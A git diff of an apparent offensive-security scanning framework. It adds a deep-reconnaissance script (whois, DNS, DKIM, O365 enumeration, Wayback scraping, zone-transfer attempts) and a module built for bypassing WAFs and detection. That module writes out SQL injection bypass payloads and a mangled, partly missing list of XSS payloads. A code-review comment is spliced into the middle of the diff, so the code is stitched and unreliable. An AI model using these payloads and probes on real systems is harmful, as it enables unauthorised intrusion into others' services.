+"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED REVERSE WHOIS & DNS ANALYSIS $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Reverse WHOIS lookup +echo -e "$OKBLUE[*]$RESET Performing reverse WHOIS lookups..." 
+whois $TARGET > $LOOT_DIR/deep-recon/whois/whois-$TARGET.txt 2>/dev/null + +# Extract email addresses from WHOIS +cat $LOOT_DIR/deep-recon/whois/whois-$TARGET.txt | grep -i "registrant email\|admin email\|tech email" | grep -o '[a-zA-Z0-9._-]*@[a-zA-Z0-9._-]*' > $LOOT_DIR/deep-recon/whois/emails-$TARGET.txt + +# Reverse DNS lookups +echo -e "$OKBLUE[*]$RESET Performing reverse DNS lookups..." +host $TARGET > $LOOT_DIR/deep-recon/dns/reverse-dns-$TARGET.txt 2>/dev/null + +# 7. DMARC ANALYSIS +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED DMARC/SPF/DKIM ANALYSIS $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# DMARC record check +echo -e "$OKBLUE[*]$RESET Checking DMARC records..." +dig TXT _dmarc.$TARGET > $LOOT_DIR/deep-recon/dmarc/dmarc-$TARGET.txt 2>/dev/null + +# SPF record check +echo -e "$OKBLUE[*]$RESET Checking SPF records..." +dig TXT $TARGET | grep -i spf > $LOOT_DIR/deep-recon/dmarc/spf-$TARGET.txt 2>/dev/null + +# DKIM record check +echo -e "$OKBLUE[*]$RESET Checking DKIM records..." +for selector in default k1 k2 google mail; do + dig TXT $selector._domainkey.$TARGET > $LOOT_DIR/deep-recon/dmarc/dkim-$selector-$TARGET.txt 2>/dev/null +done + +# 8. ANALYTICS RELATIONSHIPS +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED ANALYTICS RELATIONSHIPS MAPPING $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Google Analytics detection +echo -e "$OKBLUE[*]$RESET Searching for Google Analytics IDs..." 
+curl -s "https://$TARGET" | grep -o 'UA-[0-9]*-[0-9]*\|G-[A-Z0-9]*' > $LOOT_DIR/deep-recon/analytics/ga-$TARGET.txt 2>/dev/null + +# Google Tag Manager detection +echo -e "$OKBLUE[*]$RESET Searching for Google Tag Manager IDs..." +curl -s "https://$TARGET" | grep -o 'GTM-[A-Z0-9]*' > $LOOT_DIR/deep-recon/analytics/gtm-$TARGET.txt 2>/dev/null + +# 9. SUPPLY CHAIN INVESTIGATION +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED SUPPLY CHAIN & SaaS DISCOVERY $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Third-party service detection +echo -e "$OKBLUE[*]$RESET Analyzing third-party services..." +curl -s "https://$TARGET" | grep -o 'src="[^"]*\|href="[^"]*' | grep -E '\.(js|css)' | sort -u > $LOOT_DIR/deep-recon/supply-chain/third-party-$TARGET.txt + +# CDN detection +echo -e "$OKBLUE[*]$RESET Detecting CDN usage..." +curl -s -I "https://$TARGET" | grep -i "server\|x-served-by\|x-amz\|x-cache" > $LOOT_DIR/deep-recon/supply-chain/cdn-$TARGET.txt + +# 10. GOOGLE-FU TECHNIQUES +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED GOOGLE-FU INTELLIGENCE GATHERING $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Privacy policy analysis +echo -e "$OKBLUE[*]$RESET Analyzing privacy policy..." +curl -s "https://$TARGET/privacy-policy\|https://$TARGET/privacy" > $LOOT_DIR/deep-recon/google-fu/privacy-policy-$TARGET.html 2>/dev/null + +# Trademark search (simulated) +echo -e "$OKBLUE[*]$RESET Searching for trademarks..." 
+echo "site:uspto.gov $TARGET" > $LOOT_DIR/deep-recon/google-fu/trademark-search-$TARGET.txt + +# 11. TLD SCANNING +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED TLD ENUMERATION $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Common TLD enumeration +for tld in com net org info biz co uk de fr it es; do + host $TARGET.$tld > $LOOT_DIR/deep-recon/tlds/tld-$TARGET-$tld.txt 2>/dev/null +done + +# 12. O365 ENUMERATION +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED O365 ENUMERATION $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# O365 domain enumeration +echo -e "$OKBLUE[*]$RESET Checking for O365 services..." +for service in autodiscover autoconfig lyncdiscover enterpriseenrollment enterpriseregistration; do + host $service.$TARGET > $LOOT_DIR/deep-recon/o365/o365-$service-$TARGET.txt 2>/dev/null +done + +# 13. FAVICON ANALYSIS +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED FAVICON ANALYSIS $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Download and analyze favicon +echo -e "$OKBLUE[*]$RESET Downloading favicon for analysis..." +curl -s "https://$TARGET/favicon.ico" -o $LOOT_DIR/deep-recon/favicon/favicon-$TARGET.ico 2>/dev/null + +# 14. 
SUB-SUBDOMAIN ENUMERATION +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED SUB-SUBDOMAIN ENUMERATION $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Generate sub-subdomain wordlist +echo -e "$OKBLUE[*]$RESET Generating sub-subdomain permutations..." +for sub in $(cat $LOOT_DIR/domains/domains-$TARGET-full.txt 2>/dev/null); do + for word in dev test staging api admin; do + echo "$word.$sub" >> $LOOT_DIR/deep-recon/sub-subdomains/sub-sub-$TARGET.txt 2>/dev/null + done +done + +# 15. ESOTERIC TECHNIQUES +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED ESOTERIC RECONNAISSANCE $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Wayback Machine +echo -e "$OKBLUE[*]$RESET Gathering historical URLs from Wayback Machine..." +curl -s "https://web.archive.org/cdx/search/cdx?url=*.$TARGET&output=json&fl=original" | jq -r '.[].original' 2>/dev/null > $LOOT_DIR/deep-recon/esoteric/wayback-$TARGET.txt + +# DNS zone transfer attempts +echo -e "$OKBLUE[*]$RESET Attempting DNS zone transfers..." 
+for ns in $(dig NS $TARGET | grep -o 'NS.*' | awk '{print $2}'); do + dig axfr $TARGET @$ns > $LOOT_DIR/deep-recon/esoteric/zonetransfer-$TARGET-$ns.txt 2>/dev/null +done + +# Compile all findings +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED COMPILING DEEP RECON FINDINGS $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Aggregate all domains +cat $LOOT_DIR/domains/domains-*-$TARGET*.txt 2>/dev/null | grep $TARGET | sort -u > $LOOT_DIR/domains/domains-$TARGET-all.txt +cat $LOOT_DIR/deep-recon/crunchbase/company-domains.txt 2>/dev/null >> $LOOT_DIR/domains/domains-$TARGET-all.txt 2>/dev/null + +# Create comprehensive report +echo -e "$OKBLUE[*]$RESET Generating deep recon summary report..." +cat > $LOOT_DIR/deep-recon/deep-recon-summary-$TARGET.txt << EOF +DEEP RECONNAISSANCE SUMMARY FOR: $TARGET +Generated: $(date) +Scanner: Sn1per v$VER - Deep Recon Mode + +DOMAINS DISCOVERED: $(wc -l < $LOOT_DIR/domains/domains-$TARGET-all.txt 2>/dev/null) +IPS DISCOVERED: $(wc -l < $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null) + +MODULE RESULTS: +- SSL Analysis: $(ls -la $LOOT_DIR/deep-recon/ssl/ | wc -l) files +- Shodan Results: $(ls -la $LOOT_DIR/deep-recon/shodan/ | wc -l) files +- ASN Analysis: $(ls -la $LOOT_DIR/deep-recon/asn/ | wc -l) files +- Crunchbase: $(ls -la $LOOT_DIR/deep-recon/crunchbase/ | wc -l) files +- Analytics: $(ls -la $LOOT_DIR/deep-recon/analytics/ | wc -l) files +- Supply Chain: $(ls -la $LOOT_DIR/deep-recon/supply-chain/ | wc -l) files +- Esoteric: $(ls -la $LOOT_DIR/deep-recon/esoteric/ | wc -l) files + +HIGH PRIORITY FINDINGS: +$(grep -r "vulnerable\|CVE\|exploit\|leak\|credential" $LOOT_DIR/deep-recon/ 2>/dev/null | head -10) + +EOF + +echo -e "$OKGREEN[*]$RESET Deep reconnaissance completed 
for $TARGET" +echo -e "$OKGREEN[*]$RESET Report saved to: $LOOT_DIR/deep-recon/deep-recon-summary-$TARGET.txt" +echo -e "$OKGREEN[*]$RESET Total domains discovered: $(wc -l < $LOOT_DIR/domains/domains-$TARGET-all.txt 2>/dev/null)" +echo -e "$OKGREEN[*]$RESET Total IPs discovered: $(wc -l < $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null)" + +echo "[sn1persecurity.com] •?((¯°·._.• Completed Sn1per deep recon scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Completed Sn1per deep recon scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi diff --git a/modes/discover.sh b/modes/discover.sh old mode 100644 new mode 100755 diff --git a/modes/evasion-techniques.sh b/modes/evasion-techniques.sh new file mode 100644 index 00000000..ef3e55e5 --- /dev/null +++ b/modes/evasion-techniques.sh 
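Review bot: The `mkdir -p $LOOT_DIR/deep-recon/{...}` near the top of deep-recon.sh does not create the `whois`, `dns` or `sub-subdomains` directories, yet sections 6 and 14 write `$LOOT_DIR/deep-recon/whois/whois-$TARGET.txt`, `$LOOT_DIR/deep-recon/dns/reverse-dns-$TARGET.txt` and `$LOOT_DIR/deep-recon/sub-subdomains/sub-sub-$TARGET.txt`; with stderr sent to /dev/null those redirects fail silently and the WHOIS, reverse-DNS and permutation output is lost, so the brace list should read `mkdir -p $LOOT_DIR/deep-recon/{ssl,analytics,supply-chain,google-fu,tlds,o365,shodan,asn,crunchbase,dmarc,favicon,esoteric,whois,dns,sub-subdomains} 2>/dev/null`. The aggregation glob under "Compile all findings", `domains-*-$TARGET*.txt`, does not match the `domains-$TARGET-<tool>.txt` names this file itself writes (sublist3r, amass, crt, projectsonar, rapiddns, shodan), so `domains-$TARGET-all.txt` ends up holding little more than the Crunchbase domains; `cat $LOOT_DIR/domains/domains-$TARGET-*.txt` is what the earlier writes imply, with the `-all.txt` output excluded from the input set. Two further lines look garbled and should be checked against the committed file rather than this rendering: the certificate call `openssl s_client -connect $TARGET:443 -servername $TARGET /dev/null | openssl x509 ...` appears to have lost the `<` before `/dev/null` (the chain-analysis line below it feeds stdin via `echo |`, which is the form that works), and `curl -s "https://$TARGET/privacy-policy\|https://$TARGET/privacy"` passes the literal `\|` as part of a single URL, so neither path is actually fetched. Throughout the file `$TARGET` and `$LOOT_DIR` are expanded unquoted inside URLs and redirect targets; quoting them would keep a path with spaces or glob characters from silently changing which file a section writes.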
@@ -0,0 +1,399 @@ +#!/bin/bash +# ADVANCED EVASION TECHNIQUES MODULE ##################################################################################################### +# Sophisticated evasion techniques for bypassing security controls, WAFs, and detection systems + +if [[ "$REPORT" = "1" ]]; then + args="-t $TARGET" + if [[ "$OSINT" = "1" ]]; then + args="$args -o" + fi + if [[ "$AUTO_BRUTE" = "1" ]]; then + args="$args -b" + fi + if [[ "$FULLNMAPSCAN" = "1" ]]; then + args="$args -fp" + fi + if [[ "$RECON" = "1" ]]; then + args="$args -re" + fi + if [[ "$MODE" = "evasion" ]]; then + args="$args -m evasion" + fi + if [[ ! -z "$PORT" ]]; then + args="$args -p $PORT" + fi + if [[ ! -z "$WORKSPACE" ]]; then + args="$args -w $WORKSPACE" + fi + args="$args --noreport" + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +"%Y%m%d%H%M"`.txt 2>&1 + exit +fi + +echo -e "$OKRED ____ $RESET" +echo -e "$OKRED _________ / _/___ ___ _____$RESET" +echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" +echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" +echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" +echo -e "$OKRED /_/ $RESET" +echo -e "$RESET" +echo -e "$OKORANGE + -- --=[https://sn1persecurity.com" +echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz" +echo -e "$OKORANGE + -- --=[Advanced Evasion Techniques Mode - Sophisticated Bypass Methods" +echo -e "$RESET" + +if [[ ! 
-z $WORKSPACE ]]; then + LOOT_DIR=$WORKSPACE_DIR +fi + +echo "$TARGET" >> $LOOT_DIR/domains/targets.txt +if [[ "$MODE" = "" ]]; then + MODE="evasion-techniques" + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2>/dev/null +else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2>/dev/null +fi +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/${TARGET}-${MODE}.txt 2>/dev/null +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2>/dev/null +ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt + +echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per evasion techniques scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per evasion techniques scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi + +# Initialize evasion directories +mkdir -p $LOOT_DIR/evasion-techniques/{waf-bypass,ids-evasion,stealth-scanning,fragmentation,obfuscation} 2>/dev/null + +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED INITIALIZING ADVANCED EVASION TECHNIQUES $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# 1. 
WAF BYPASS TECHNIQUES +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED WAF BYPASS TECHNIQUES $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Testing WAF bypass techniques..." + +# WAF Detection +echo -e "$OKBLUE[*]$RESET Detecting WAF presence..." +wafw00f $TARGET > $LOOT_DIR/evasion-techniques/waf-bypass/waf-detection-$TARGET.txt 2>/dev/null + +# SQL Injection bypass payloads +echo -e "$OKBLUE[*]$RESET Testing SQL injection bypass techniques..." +cat > $LOOT_DIR/evasion-techniques/waf-bypass/sqli-bypass-payloads.txt << EOF +# WAF Bypass SQL Injection Payloads +' OR '1'='1 +%27%20OR%20%271%27%3D%271 +/**/OR/**/1=1 +' OR 1=1# +' OR '1'='1'/* +' OR 1=1 LIMIT 1-- +' OR 1=1-- - +'/**/OR/**/1=1-- +' OR 1=1%23 +' OR 1=1;%00 +' OR 1=1 UNION SELECT 1,2,3-- +/**/UNION/**/SELECT/**/1,2,3-- +UNION SELECT 1,2,3%23 +UNION SELECT 1,2,3;%00 +' UNION SELECT 1,2,3%0A +' UNION SELECT 1,2,3%0D%0A +EOF + +# XSS bypass payloads +echo -e "$OKBLUE[*]$RESET Testing XSS bypass techniques..." +cat > $LOOT_DIR/evasion-techniques/waf-bypass/xss-bypass-payloads.txt << EOF +# WAF Bypass XSS Payloads + +ipt>alert(1)ipt> + + + + + + + + +